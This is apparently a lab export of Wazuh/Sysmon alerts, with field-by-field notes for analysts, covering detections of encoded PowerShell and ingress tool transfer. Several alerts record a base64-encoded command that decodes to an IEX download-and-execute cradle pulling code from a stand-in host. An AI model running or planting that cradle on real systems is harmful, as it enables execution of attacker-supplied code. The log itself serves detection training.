data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1af-680a-080d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 140 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535415.2931443 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:53.6583905Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351030 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:53.627
ProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00}
ProcessId: 9788
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gep4ex1m.bat.ps1
CreationUtcTime: 2025-04-24 22:56:53.627
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:53.627 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1b2-680a-0a0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9788 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gep4ex1m.bat.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:53.627 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 137 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535418.2934208 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:56.7879399Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351054 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:55.313
ProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00}
ProcessId: 13984
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00}
ParentProcessId: 9788
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:55.313 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1b7-680a-0c0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1b2-680a-0a0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9788 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 141 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535418.2942275 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:57.0976263Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351055 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:57.052
ProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00}
ProcessId: 13984
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2jg0gk4w.yqo.ps1
CreationUtcTime: 2025-04-24 22:56:57.052
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:57.052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1b7-680a-0c0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2jg0gk4w.yqo.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:57.052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 138 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535422.2945044 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:57:00.2839410Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 351088 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:58.730
ProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00}
ProcessId: 16768
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00}
ParentProcessId: 13984
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:58.730 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c1ba-680a-0e0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16768 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 142 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535423.2953115 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
